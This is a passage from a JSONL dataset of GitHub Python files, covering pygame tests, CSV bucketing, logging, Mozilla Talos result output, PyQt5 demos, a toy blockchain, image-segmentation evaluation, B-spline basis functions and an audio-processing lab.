pygame.image.save(screen, \"planet.png\")\n\n # 'planet' in the center of screen\n screen.fill(pygame.Color(\"black\"))\n title_menu.run_game()\n\n pygame.display.flip()\n\n\nif __name__ == \"__main__\":\n test_enemy()\n","repo_name":"avivajpeyi/ludum_dare_49","sub_path":"test/test_title_screen.py","file_name":"test_title_screen.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"41265290471","text":"import bucketsorter as bucketer\nimport json\nimport sys #testing\n\n\n# wrapped int his function just to more easily swap in various files\ndef purchase_data_into_buckets(purchase_csv,buckets_csv,output_name):\n\t# [[purchase line one],[purchase line 2],etc...]\n\tpurchase_data = bucketer.getPurchaseRecords(purchase_csv)\n\n\t# {1:bucket1,2:bucket2,etc...}\n\tbuckets = bucketer.getBuckets(buckets_csv)\n\n\t# {publisher1:{bucket data + index}, publisher2:{bucket data + index}, etc...}\n\tsorted_buckets = bucketer.sortBuckets(buckets)\n\n\t# trim out the internal index, dont need it anymore, used for sort\n\tbuckets = [buckets[b][0:4] for b in buckets] \n\n\t# puts together the json\n\tfor purchase in purchase_data:\n\t\tindex = bucketer.possibleMatches(purchase,sorted_buckets)\n\t\tpurchase_string = \",\".join(p for p in purchase)\n\t\tbuckets[index][3][\"purchases\"].append(purchase_string)\n\n\tjson_data = []\n\tfor bucket in buckets:\n\t\tjson_data.append( {\"bucket\": ','.join(bucket[:3]), \"purchases\":[bucket[3]['purchases']]} )\n\n\twith open(output_name, 'w') as outfile:\n\t\tjson.dump(json_data, outfile)\n\t# print json.dumps(json_data)\n\n\n\npurchase_data_into_buckets('purchase_data.csv','purchase_buckets.csv','output.txt')\npurchase_data_into_buckets('test_purchase.csv','test_buckets.csv','test_output.txt')\n\n","repo_name":"JoshKK-projects/bucket_sorting","sub_path":"bucket_sorting.py","file_name":"bucket_sorting.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"21549263599","text":"import os\nimport sys\nimport logging\nimport logging.handlers\n\n\nDEBUG_LOG_FOLDER = os.path.join(os.getcwd(), \"Debug\")\nDEBUG_LOG_FILE = os.path.join(DEBUG_LOG_FOLDER, \"debug.log\")\nDEBUG_LOGGER_NAME = \"debug_log\"\n\nif not os.path.exists(DEBUG_LOG_FOLDER):\n os.makedirs(DEBUG_LOG_FOLDER)\n\n\nclass CustomFormatter(logging.Formatter):\n \"\"\" \"\"\"\n\n def __init__(self, fmt=\"%(asctime)s - %(levelname)s - %(message)s\", datefmt='<%m/%d/%Y %H:%M:%S>'):\n logging.Formatter.__init__(self, fmt=fmt, datefmt=datefmt)\n\n def format(self, record):\n\n # Remember the original format\n format_orig = self._style._fmt\n\n if record.levelno == logging.ERROR:\n self._style._fmt = \"%(asctime)s - %(levelname)s - %(module)s.%(funcName)s - %(message)s\"\n\n # Calling the original formatter once the style has changed\n result = logging.Formatter.format(self, record)\n\n # Restore the original format\n self._style._fmt = format_orig\n\n return result\n\n\n# Create the shared logger\nshared_logger = logging.getLogger(DEBUG_LOGGER_NAME)\nshared_logger.setLevel(logging.DEBUG)\n\n# Create a file handler for the shared logger\nhandlers = {\n logging.handlers.TimedRotatingFileHandler(\n DEBUG_LOG_FILE, when='D', interval=1, backupCount=7, utc=True),\n logging.StreamHandler(sys.stdout),\n}\n\nformatter = CustomFormatter()\n\nfor handler in handlers:\n handler.setFormatter(formatter)\n shared_logger.addHandler(handler)\n\n\ndef create_logger():\n logger = logging.getLogger(DEBUG_LOGGER_NAME)\n return logger\n","repo_name":"bstaple1/MTGA_Draft_17Lands","sub_path":"src/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"68"} +{"seq_id":"9037887990","text":"\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\n\"\"\"output formats for Talos\"\"\"\n\nimport filter\nimport json\nimport utils\n\nfrom mozlog import get_proxy_logger\n\n# NOTE: we have a circular dependency with output.py when we import results\nimport results as TalosResults\n\nLOG = get_proxy_logger()\n\n\ndef filesizeformat(bytes):\n \"\"\"\n Format the value like a 'human-readable' file size (i.e. 13 KB, 4.1 MB, 102\n bytes, etc).\n \"\"\"\n bytes = float(bytes)\n formats = ('B', 'KB', 'MB')\n for f in formats:\n if bytes < 1024:\n return \"%.1f%s\" % (bytes, f)\n bytes /= 1024\n return \"%.1fGB\" % bytes # has to be GB\n\n\nclass Output(object):\n \"\"\"abstract base class for Talos output\"\"\"\n\n @classmethod\n def check(cls, urls):\n \"\"\"check to ensure that the urls are valid\"\"\"\n\n def __init__(self, results):\n \"\"\"\n - results : TalosResults instance\n \"\"\"\n self.results = results\n\n def __call__(self):\n suites = []\n test_results = {\n 'framework': {\n 'name': self.results.results[0].framework,\n },\n 'suites': suites,\n }\n\n for test in self.results.results:\n # serialize test results\n tsresult = None\n if not test.using_xperf:\n subtests = []\n suite = {\n 'name': test.name(),\n 'subtests': subtests,\n }\n\n if self.results.extra_options:\n suite['extraOptions'] = self.results.extra_options\n\n suites.append(suite)\n vals = []\n replicates = {}\n\n # TODO: counters!!!! we don't have any, but they suffer the\n # same\n for result in test.results:\n # XXX this will not work for manifests which list\n # the same page name twice. It also ignores cycles\n for page, val in result.raw_values():\n if page == 'NULL':\n page = test.name()\n if tsresult is None:\n tsresult = r = TalosResults.Results()\n r.results = [{'index': 0, 'page': test.name(),\n 'runs': val}]\n else:\n r = tsresult.results[0]\n if r['page'] == test.name():\n r['runs'].extend(val)\n replicates.setdefault(page, []).extend(val)\n\n tresults = [tsresult] if tsresult else test.results\n\n for result in tresults:\n filtered_results = \\\n result.values(suite['name'],\n test.test_config['filters'])\n vals.extend([[i['value'], j] for i, j in filtered_results])\n for val, page in filtered_results:\n if page == 'NULL':\n # no real subtests\n page = test.name()\n subtest = {\n 'name': page,\n 'value': val['filtered'],\n 'replicates': replicates[page],\n }\n subtests.append(subtest)\n if test.test_config.get('lower_is_better') is not None:\n subtest['lowerIsBetter'] = \\\n test.test_config['lower_is_better']\n if test.test_config.get('alert_threshold') is not None:\n subtest['alertThreshold'] = \\\n test.test_config['alert_threshold']\n if test.test_config.get('unit'):\n subtest['unit'] = test.test_config['unit']\n\n # if there is more than one subtest, calculate a summary result\n if len(subtests) > 1:\n suite['value'] = self.construct_results(\n vals, testname=test.name())\n if test.test_config.get('lower_is_better') is not None:\n suite['lowerIsBetter'] = \\\n test.test_config['lower_is_better']\n if test.test_config.get('alert_threshold') is not None:\n suite['alertThreshold'] = \\\n test.test_config['alert_threshold']\n\n # counters results_aux data\n counter_subtests = []\n for cd in test.all_counter_results:\n for name, vals in cd.items():\n # We want to add the xperf data as talos_counters\n # exclude counters whose values are tuples (bad for\n # graphserver)\n if len(vals) > 0 and isinstance(vals[0], list):\n continue\n\n # mainthread IO is a list of filenames and accesses, we do\n # not report this as a counter\n if 'mainthreadio' in name:\n continue\n\n # responsiveness has it's own metric, not the mean\n # TODO: consider doing this for all counters\n if 'responsiveness' is name:\n subtest = {\n 'name': name,\n 'value': filter.responsiveness_Metric(vals)\n }\n counter_subtests.append(subtest)\n continue\n\n subtest = {\n 'name': name,\n 'value': 0.0,\n }\n counter_subtests.append(subtest)\n\n if test.using_xperf:\n if len(vals) > 0:\n subtest['value'] = vals[0]\n else:\n # calculate mean value\n if len(vals) > 0:\n varray = [float(v) for v in vals]\n subtest['value'] = filter.mean(varray)\n if counter_subtests:\n suites.append({'name': test.name(),\n 'subtests': counter_subtests})\n return test_results\n\n def output(self, results, results_url, tbpl_output):\n \"\"\"output to the a file if results_url starts with file://\n - results : json instance\n - results_url : file:// URL\n \"\"\"\n\n # parse the results url\n results_url_split = utils.urlsplit(results_url)\n results_scheme, results_server, results_path, _, _ = results_url_split\n\n if results_scheme in ('http', 'https'):\n self.post(results, results_server, results_path, results_scheme,\n tbpl_output)\n elif results_scheme == 'file':\n with open(results_path, 'w') as f:\n for result in results:\n f.write(\"%s\\n\" % result)\n else:\n raise NotImplementedError(\n \"%s: %s - only http://, https://, and file:// supported\"\n % (self.__class__.__name__, results_url)\n )\n\n # This is the output that treeherder expects to find when parsing the\n # log file\n if 'spsProfile' not in self.results.extra_options:\n LOG.info(\"PERFHERDER_DATA: %s\" % json.dumps(results))\n if results_scheme in ('file'):\n json.dump(results, open(results_path, 'w'), indent=2,\n sort_keys=True)\n\n def post(self, results, server, path, scheme, tbpl_output):\n raise NotImplementedError(\"Abstract base class\")\n\n @classmethod\n def shortName(cls, name):\n \"\"\"short name for counters\"\"\"\n names = {\"Working Set\": \"memset\",\n \"% Processor Time\": \"%cpu\",\n \"Private Bytes\": \"pbytes\",\n \"RSS\": \"rss\",\n \"XRes\": \"xres\",\n \"Modified Page List Bytes\": \"modlistbytes\",\n \"Main_RSS\": \"main_rss\"}\n return names.get(name, name)\n\n @classmethod\n def isMemoryMetric(cls, resultName):\n \"\"\"returns if the result is a memory metric\"\"\"\n memory_metric = ['memset', 'rss', 'pbytes', 'xres', 'modlistbytes',\n 'main_rss', 'content_rss'] # measured in bytes\n return bool([i for i in memory_metric if i in resultName])\n\n @classmethod\n def v8_Metric(cls, val_list):\n results = [i for i, j in val_list]\n score = 100 * filter.geometric_mean(results)\n return score\n\n @classmethod\n def JS_Metric(cls, val_list):\n \"\"\"v8 benchmark score\"\"\"\n results = [i for i, j in val_list]\n LOG.info(\"javascript benchmark\")\n return sum(results)\n\n @classmethod\n def CanvasMark_Metric(cls, val_list):\n \"\"\"CanvasMark benchmark score (NOTE: this is identical to JS_Metric)\"\"\"\n results = [i for i, j in val_list]\n LOG.info(\"CanvasMark benchmark\")\n return sum(results)\n\n def construct_results(self, vals, testname):\n if 'responsiveness' in testname:\n return filter.responsiveness_Metric([val for (val, page) in vals])\n elif testname.startswith('v8_7'):\n return self.v8_Metric(vals)\n elif testname.startswith('kraken'):\n return self.JS_Metric(vals)\n elif testname.startswith('tcanvasmark'):\n return self.CanvasMark_Metric(vals)\n elif len(vals) > 1:\n return filter.geometric_mean([i for i, j in vals])\n else:\n return filter.mean([i for i, j in vals])\n","repo_name":"mozilla/positron","sub_path":"testing/talos/talos/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":9934,"program_lang":"python","lang":"en","doc_type":"code","stars":553,"dataset":"github-code","pt":"68"} +{"seq_id":"6335032483","text":"import os\nimport shutil\nfrom PIL import Image\nfrom tqdm import tqdm\n# 遍历文件夹\ndef iter_files(old_path, new_path):\n # 遍历根目录 group\n for root, dirs, files in os.walk(old_path):\n for file in files:\n group = root.split(\"\\\\\")[-1]\n # file_name = os.path.join(root, file)\n path1 = os.path.join(root, file)\n print(\"path1\", path1)\n # print(path1.size())\n path2 = os.path.join(new_path, group + \"_\" + file)\n print(\"path2\",path2)\n shutil.copy(path1, path2)\n print(\"finished\")\n exit(0)\ndef print_imgsize(path1):\n # tif_list = [x for x in os.listdir(path) if x.endswith(\".tiff\")]\n # l = sorted(tif_list)\n # print(l)\n for file in os.listdir(path1):\n im = Image.open(os.path.join(save_path, file)) # 返回一个Image对象\n print(file, \"=====\", im.size)\n # print('宽:%d,高:%d' % (im.size[0], im.size[1]))\ndef print_2imgsize(path1, path2):\n info1 = []\n for file in os.listdir(path1):\n im = Image.open(os.path.join(save_path, file)) # 返回一个Image对象\n size = im.size\n info1.append(file + \"===\" + str(size))\n info2 = []\n for file in os.listdir(path1):\n im = Image.open(os.path.join(save_path, file)) # 返回一个Image对象\n size = im.size\n info2.append(file + \"===\" + str(size))\n\n for i in range(len(info2)):\n print(info2[i], \"====\", info1[i])\nif __name__ == '__main__':\n src_path = r\"H:\\海康_全要素\\hk_drone\"\n save_path = r\"H:\\海康_全要素\\drone\\poly\"\n path2 = r\"H:\\海康_全要素\\drone\\poly\"\n # iter_files(src_path, save_path)\n # print_imgsize(save_path)\n print_2imgsize(save_path, path2)","repo_name":"richerd0703/python_tool","sub_path":"useful_code/more_dir_file.py","file_name":"more_dir_file.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"26223488295","text":"'''\n106-QButtonGroup-移除按钮\n\n将按钮组中的其中一个按钮移出组,并不是删除按钮\n\nAPI:\n removeButton(QAbstractButton) -- 移除指定按钮\n'''\nimport sys\n\nfrom PyQt5.QtWidgets import QWidget, QApplication, QRadioButton, QButtonGroup\n\n\nclass Window(QWidget):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.setWindowTitle('106_QButtonGroup_移除按钮')\n self.resize(1000, 500)\n\n '''初始化一组单选按钮'''\n rb_man = QRadioButton('男', self)\n rb_woman = QRadioButton('女', self)\n rb_man.move(10, 10)\n rb_woman.move(70, 10)\n sex_group = QButtonGroup(self)\n sex_group.addButton(rb_man)\n sex_group.addButton(rb_woman)\n\n '''将其中一个按钮移除按钮组'''\n # 若下面的代码生效,那么两个按钮将不会互斥\n sex_group.removeButton(rb_man)\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n\n window = Window()\n window.show()\n\n sys.exit(app.exec_())\n","repo_name":"anyuhanfei/study_PyQt5","sub_path":"104~109-QButtonGroup/106-QButtonGroup-移除按钮.py","file_name":"106-QButtonGroup-移除按钮.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"19879752686","text":"import hashlib\nimport time\n\nfrom signature import *\nfrom sync import synchronize_chain, listen_for_requests\n\nport = 8080\noutro_host = '192.168.0.100' # Endereço IP do outro nó\noutro_port = 5000 # Porta em que o outro nó está escutando\n\nclass Transaction:\n def __init__(self, sender, recipient, amount):\n self.sender = sender\n self.recipient = recipient\n self.amount = amount\n self.signature = None \n\n def __str__(self):\n return f\"Sender: {self.sender}, Recipient: {self.recipient}, Amount: {self.amount}, Signature: {self.signature}\"\n\n\nclass Block:\n def __init__(self, index, timestamp, transactions, data, previous_hash, nonce=0):\n self.index = index\n self.timestamp = timestamp\n self.transactions = transactions\n self.data = data\n self.previous_hash = previous_hash\n self.nonce = nonce\n self.hash = self.calculate_hash()\n\n def __str__(self):\n transaction_details = \"\\n\".join(str(transaction) for transaction in self.transactions)\n return f\"Index: {self.index}\\nTimestamp: {self.timestamp}\\nTransactions:\\n{transaction_details}\\nHash: {self.hash}\\nPrevious Hash: {self.previous_hash}\"\n\n def calculate_hash(self):\n sha = hashlib.sha256()\n sha.update((str(self.index) + str(self.timestamp) + str(self.transactions) + str(self.previous_hash) + str(self.nonce)).encode('utf-8'))\n return sha.hexdigest()\n\n def mine_block(self, difficulty):\n target = '0' * difficulty\n while self.hash[:difficulty] != target:\n self.nonce += 1\n self.hash = self.calculate_hash()\n\nclass Blockchain:\n def __init__(self):\n self.chain = [self.create_genesis_block()]\n self.difficulty = 4\n self.pending_transactions = []\n\n def create_genesis_block(self):\n return Block(0, time.time(), [], \"Genesis Block\", \"0\", nonce=0)\n\n def get_latest_block(self):\n return self.chain[-1]\n\n def add_transaction(self, transaction):\n self.pending_transactions.append(transaction)\n\n def mine_pending_transactions(self, miner_address):\n previous_hash = self.get_latest_block().hash\n block = Block(len(self.chain), time.time(), self.pending_transactions, \"Block data\", previous_hash, nonce=0)\n block.mine_block(self.difficulty)\n self.chain.append(block)\n self.pending_transactions = []\n\n def add_block(self, new_block):\n new_block.previous_hash = self.get_latest_block().hash\n new_block.mine_block(self.difficulty)\n new_block.hash = new_block.calculate_hash()\n self.chain.append(new_block)\n\n def is_chain_valid(self):\n for i in range(1, len(self.chain)):\n current_block = self.chain[i]\n previous_block = self.chain[i - 1]\n if current_block.hash != current_block.calculate_hash():\n return False\n if current_block.previous_hash != previous_block.hash:\n return False\n return True\n \n\nblockchain = Blockchain()\n\n# Iniciar a sincronização com outro nó na rede\nblockchain.chain = synchronize_chain(outro_host, outro_port)\n\n# Iniciar a escuta de solicitações de outros nós\nlisten_for_requests(port, blockchain)\n\ntransaction1 = Transaction(\"Bismuto\", \"Mafalda\", 7)\ntransaction2 = Transaction(\"Saci\", \"Oracio\", 3)\ntransaction3 = Transaction(\"Florentina\", \"Dolores\", 0.5)\n\n# Assinando as transações com a chave privada\nsign_transaction(transaction1, private_key)\nsign_transaction(transaction2, private_key)\nsign_transaction(transaction3, private_key)\n\n# Verificando a assinatura das transações com a chave pública\nprint(\"Verifying transaction signatures...\")\nprint(\"Transaction 1 signature:\", verify_signature(transaction1, public_key))\nprint(\"Transaction 2 signature:\", verify_signature(transaction2, public_key))\nprint(\"Transaction 3 signature:\", verify_signature(transaction3, public_key))\n\n# Adicionando as transações pendentes\nblockchain.add_transaction(transaction1)\nblockchain.add_transaction(transaction2)\nblockchain.add_transaction(transaction3)\n\n# Mineração das transações pendentes\nprint(\"\\nMinerando blocos...\")\nblockchain.mine_pending_transactions(\"Miner\")\n\n# Verificação da cadeia\nprint(\"Validade da cadeia:\", blockchain.is_chain_valid())\n\nfor block in blockchain.chain:\n print(f\"\\nÍndice: {block.index}\")\n print(f\"Timestamp: {block.timestamp}\")\n print(\"Transactions:\")\n for transaction in block.transactions:\n print(transaction)\n print(f\"Hash: {block.hash}\")\n print(f\"Previous Hash: {block.previous_hash}\")","repo_name":"Mbrizzo/blockc","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74215245656","text":"from utils import *\nimport numpy as np\nfrom tqdm import tqdm, trange\nfrom run_on_image import inference_on_image_stack\nimport glob\nimport pandas as pd\nimport torch\nimport torch.nn.functional as F\n\n# Given greyscale images, masks in .npz format, get the Jaccard similarity and BCE loss from a given model\ndef main():\n debug_n = 0\n data_dir = \"/home/prakashlab/Documents/kmarx/train_m2unet_cellpose_cloud/data_uganda_hemaprep_mid_third_subset\"\n model_path = \"/home/prakashlab/Documents/kmarx/train_m2unet_cellpose_cloud/m2unet_model_flat_less_erode_2_rotfirst\"\n model_name = \"model_24_9.pth\"\n save_dir = \"results_flat_erode_rotfirst_with_eroded_masks_final\"\n save_file = \"uganda_mid_third\"\n save_best = True # save the image with the lowest loss\n save_worst = True # save the image with the highest loss\n n_batch = 50\n erode_mask = 1 # set negative to ignore\n\n os.makedirs(save_dir, exist_ok=True)\n\n # Get image paths\n images = glob.glob(os.path.join(data_dir, \"**.npz\"), recursive=True)\n n_images = len(images)\n print(f\"{n_images} images to process\")\n w, h = np.load(images[0])[\"img\"].shape\n # preallocate memory for the images, masks, and predictions\n image_stack = np.zeros((n_batch, w, h), dtype=float)\n mask_stack = np.zeros((n_batch, w, h), dtype=bool)\n inference_stack = np.zeros((n_batch, w, h), dtype=bool)\n # store results: paths,jaccard,bce\n data_list = []\n # loop in batches\n index = 0\n if save_best:\n best_loss = np.inf\n best_pred = np.zeros((w, h), dtype=np.uint8)\n if save_worst:\n worst_loss = 0\n worst_pred = np.zeros((w, h), dtype=np.uint8)\n pbar = tqdm(total=n_images)\n while index < n_images:\n end_idx = min(index + n_batch, n_images)\n # load batch of images\n for i in range(index,end_idx):\n data = np.load(images[i])\n # Load the image\n image_stack[(i-index), :, :] = data[\"img\"]\n # Load the mask\n if erode_mask >= 0:\n shape = cv2.MORPH_ELLIPSE\n element = cv2.getStructuringElement(shape, (2 * erode_mask + 1, 2 * erode_mask + 1), (erode_mask, erode_mask))\n mask_stack[(i-index), :, :] = np.array(cv2.erode(data[\"mask\"], element))\n else:\n mask_stack[(i-index), :, :] = data[\"mask\"]\n inference_stack, __, times = inference_on_image_stack(image_stack, model_path, model_name)\n # compare results\n for i in range(index,end_idx):\n jaccard = jaccard_similarity_bin_mask(mask_stack[(i-index), :, :], inference_stack[(i-index), :, :])\n bce = binary_cross_entropy(mask_stack[(i-index), :, :], inference_stack[(i-index), :, :])\n path = images[i]\n data_list.append([path, jaccard, bce, times[i-index]])\n if save_best:\n if bce < best_loss:\n best_loss = bce\n best_pred = 225*inference_stack[(i-index), :, :]\n if save_worst:\n if bce > worst_loss:\n worst_loss = bce\n worst_pred = 225*inference_stack[(i-index), :, :]\n if jaccard < 0.7:\n cv2.imwrite(os.path.join(save_dir, f\"{i}_{save_file}_worst_pred.png\"), worst_pred)\n cv2.imwrite(os.path.join(save_dir, f\"{i}_{save_file}_worst_im.png\"), image_stack[(i-index), :, :])\n pbar.update(end_idx - index)\n index = end_idx\n if debug_n > 0 and index > debug_n:\n break\n pbar.close()\n results_df = pd.DataFrame(columns=['path', 'jaccard', 'bce', 'time'], data=data_list)\n results_df.to_csv(os.path.join(save_dir, f\"{save_file}_{n_images}.csv\"))\n if save_best:\n cv2.imwrite(os.path.join(save_dir, f\"{save_file}_best.png\"), best_pred)\n if save_worst:\n cv2.imwrite(os.path.join(save_dir, f\"{save_file}_worst.png\"), worst_pred)\n\n\ndef jaccard_similarity_bin_mask(A, B):\n # Calculate Jaccard similarity of two masks\n intersection = np.sum(np.logical_and(A, B))\n union = np.sum(np.logical_or(A, B))\n res = intersection/union\n return res\n\ndef binary_cross_entropy(y_true, y_pred):\n # Convert to tensors\n y_true = torch.tensor(y_true).float()\n y_pred = torch.tensor(y_pred).float()\n\n # Calculate binary cross-entropy\n bce_loss = F.binary_cross_entropy(y_pred, y_true)\n\n return bce_loss.item()\n\nif __name__ == \"__main__\":\n main()","repo_name":"kmarx-kmarx-kmarx/m2unet_image_harness","sub_path":"test_bulk_data.py","file_name":"test_bulk_data.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"17799535337","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 12 18:44:58 2016\n@author: robintiman\n\"\"\"\nfrom scipy import *\nfrom pylab import *\n\n\nclass P1:\n\n def __init__(self):\n knot = [0, 1, 2, 3, 4, 5, 6]\n self.basis_func(knot, 3, 4, 3.4)\n print(\"hekk\")\n\n # knot vector U = { u0, u1, ..., um }\n def basis_func(knot, k, i, u):\n # Base case\n if (k == 0):\n if knot[i-1] == knot[i]:\n return 0\n elif (u >= knot[i-1] and u < knot[i]):\n return 1\n else:\n return 0\n\n # Perform the division and set a or b to 0 if division by zero occurs\n try:\n a = (u - knot[i-1]) / (knot[i+k-1] - knot[i-1])\n b = (knot[i+k] - u) / (knot[i+k] - knot[i])\n except ZeroDivisionError:\n if (a):\n b = 0\n elif (b):\n a = 0\n\n return a * basis_func(knot, k-1, i, u) + b * basis_func(knot, k-1, i+1, u)\n\n\n","repo_name":"robintiman-zz/FMNN25","sub_path":"p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"31740142984","text":"\"\"\"\n6.1010 Spring '23 Lab 0: Audio Processing\n\"\"\"\n\nimport wave\nimport struct\n\n# No additional imports allowed!\n\n\ndef backwards(sound):\n \"\"\"\n Compute a new mono sound which is the reversed version of the original mono sound\n Args:\n sound: A mono sound dictionary with two key/value pairs:\n * \"rate\": an int representing the sampling rate, samples per second\n * \"samples\": a list of floats containing the sampled values\n\n Returns:\n A new mono sound dictionary.\n \"\"\"\n new_samples = sound[\"samples\"][::-1] # list of samples in reverse\n new_sound = {} # new dict\n new_sound[\"rate\"] = sound[\"rate\"]\n new_sound[\"samples\"] = new_samples\n return new_sound\n\n\ndef mix(sound1, sound2, p):\n \"\"\"\n Mixes 2 sounds\n Args:\n sound1: dict with same 'rate' as sound2\n sound2: dict with same 'rate' as sound1\n p: mixing parameter\n Returns:\n A new sound which is p*'samples' in sound1 + (1-p)*'samples' in sound2.\n Return None if diff rate\n \"\"\"\n # mix 2 good sounds\n if not (\n \"rate\" in sound1.keys()\n and \"rate\" in sound2.keys()\n and sound1[\"rate\"] == sound2[\"rate\"]\n ):\n return\n\n r = sound1[\"rate\"] # get rate\n if len(sound1) == 2 and len(sound2) == 2:\n sound1 = sound1[\"samples\"]\n sound2 = sound2[\"samples\"]\n sound_len=min(len(sound1),len(sound2))\n \n mix_sample_mono = mixsample(sound1,sound2,p)\n \n return {\"rate\": r, \"samples\": mix_sample_mono} # return new sound\n\n if len(sound1) == 3 and len(sound2) == 3:\n sound1_lft = sound1[\"left\"]\n sound2_lft = sound2[\"left\"]\n mix_sample_lft = mixsample(sound1_lft,sound2_lft,p)\n\n sound1_rt = sound1[\"right\"]\n sound2_rt = sound2[\"right\"]\n mix_sample_rt = mixsample(sound1_rt,sound2_rt,p)\n \n return {\"rate\": r, \"left\": mix_sample_lft, \"right\": mix_sample_rt}\n\ndef mixsample(sound1,sound2,p):\n \"\"\"\n Computes mixing of sample for mix fn\n Args:\n sound1: dict\n sound2: dict\n Return:\n mix_sample: list\n \"\"\"\n sound_len=min(len(sound1),len(sound2))\n mix_sample = []\n x = 0\n while x <= sound_len:\n s2, s1 = p * sound1[x], sound2[x] * (1 - p)\n mix_sample.append(s1 + s2) # add sounds\n x += 1\n if x == sound_len: # end\n break\n return mix_sample\n\ndef convolve(sound, kernel):\n \"\"\"\n Applies a filter to a sound, resulting in a new sound that is longer than\n the original mono sound by the length of the kernel - 1.\n Does not modify inputs.\n\n Args:\n sound: A mono sound dictionary with two key/value pairs:\n * \"rate\": an int representing the sampling rate, samples per second\n * \"samples\": a list of floats containing the sampled values\n kernel: A list of numbers\n\n Returns:\n A new mono sound dictionary.\n \"\"\"\n samples = [0] # a list of scaled sample lists\n\n result_len = len(sound[\"samples\"]) + len(kernel) - 1\n samples *= result_len # list of 0's\n\n for shift, scale in enumerate(kernel): # gives index and num\n if scale != 0:\n for i, num in enumerate(sound[\"samples\"]):\n scale_sample = num * scale\n samples[i + shift] += scale_sample # add as you go, no list in btwn\n\n convolve_sound = {} # new dict\n convolve_sound[\"rate\"] = sound[\"rate\"]\n convolve_sound[\"samples\"] = samples\n\n return convolve_sound\n\n \n\ndef echo(sound, num_echoes, delay, scale):\n \"\"\"\n Compute a new signal consisting of several scaled-down and delayed versions\n of the input sound. Does not modify input sound.\n\n Args:\n sound: a dictionary representing the original mono sound\n num_echoes: int, the number of additional copies of the sound to add\n delay: float, the amount of seconds each echo should be delayed\n scale: float, the amount by which each echo's samples should be scaled\n\n Returns:\n A new mono sound dictionary resulting from applying the echo effect.\n \"\"\"\n # echo_filter = [0] * (sample_delay * num_echoes) #list of 0's of new len\n sample_delay = round(delay * sound[\"rate\"]) # num of samples\n\n # make kernel\n zero_lst = [0] * (sample_delay - 1)\n scale_lst = []\n\n for i in range(num_echoes + 1):\n scale_lst.extend([scale**i]) # match scale to indx\n if i != num_echoes: # no 0's at end\n scale_lst.extend(zero_lst)\n\n return convolve(sound, scale_lst)\n\n \n\ndef pan(sound):\n \"\"\"\n Create a really neat spatial effect\n Args:\n sound: dict with keys 'rate','lft','rght'\n Returns:\n new list with scaled values\n \"\"\"\n\n sound_lft = sound[\"left\"][:]\n sound_rt = sound[\"right\"][:]\n len_dp_sound = len(sound_lft) # same len\n # print(len_dp_sound)\n adj_samples = {}\n adj_samples[\"rate\"] = sound[\"rate\"]\n adj_lft = []\n adj_rt = []\n\n for i in range(len_dp_sound):\n if i == 0: # index = 0\n adj_lft.append(sound_lft[0])\n adj_rt.append(0)\n elif i == len_dp_sound - 1: # last indx\n adj_rt.append(sound_rt[len_dp_sound - 1])\n adj_lft.append(0)\n else: # scale\n adj_rt.append(sound_rt[i] * (i / (len_dp_sound - 1))) # added ()\n adj_lft.append(sound_lft[i] * ((1 - (i / (len_dp_sound - 1)))))\n\n adj_samples[\"left\"] = adj_lft\n adj_samples[\"right\"] = adj_rt\n\n return adj_samples\n\n\ndef remove_vocals(sound):\n \"\"\"\n Remove vocals from sound\n Args:\n sound: stero\n Returns:\n new sound: mono\n \"\"\"\n sound_lft = sound[\"left\"][:] # list copy\n sound_rt = sound[\"right\"][:]\n rem_sound = {} # new dict\n rem_sound[\"rate\"] = sound[\"rate\"]\n rem_lst = []\n\n for i,j in enumerate(sound_lft): # calc diff\n rem_lst.extend([j - sound_rt[i]]) # must be list to extend\n\n rem_sound[\"samples\"] = rem_lst\n\n return rem_sound\n\n\n# below are helper functions for converting back-and-forth between WAV files\n# and our internal dictionary representation for sounds\n\n\ndef bass_boost_kernel(boost, scale=0):\n \"\"\"\n Constructs a kernel that acts as a bass-boost filter.\n\n We start by making a low-pass filter, whose frequency response is given by\n (1/2 + 1/2cos(Omega)) ^ N\n\n Then we scale that piece up and add a copy of the original signal back in.\n\n Args:\n boost: an int that controls the frequencies that are boosted (0 will\n boost all frequencies roughly equally, and larger values allow more\n focus on the lowest frequencies in the input sound).\n scale: a float, default value of 0 means no boosting at all, and larger\n values boost the low-frequency content more);\n\n Returns:\n A list of floats representing a bass boost kernel.\n \"\"\"\n # make this a fake \"sound\" so that we can use the convolve function\n base = {\"rate\": 0, \"samples\": [0.25, 0.5, 0.25]}\n kernel = {\"rate\": 0, \"samples\": [0.25, 0.5, 0.25]}\n for i in range(boost):\n kernel = convolve(kernel, base[\"samples\"])\n kernel = kernel[\"samples\"]\n\n # at this point, the kernel will be acting as a low-pass filter, so we\n # scale up the values by the given scale, and add in a value in the middle\n # to get a (delayed) copy of the original\n kernel = [i * scale for i in kernel]\n kernel[len(kernel) // 2] += 1\n\n return kernel\n\n\ndef load_wav(filename, stereo=False):\n \"\"\"\n Load a file and return a sound dictionary.\n\n Args:\n filename: string ending in '.wav' representing the sound file\n stereo: bool, by default sound is loaded as mono, if 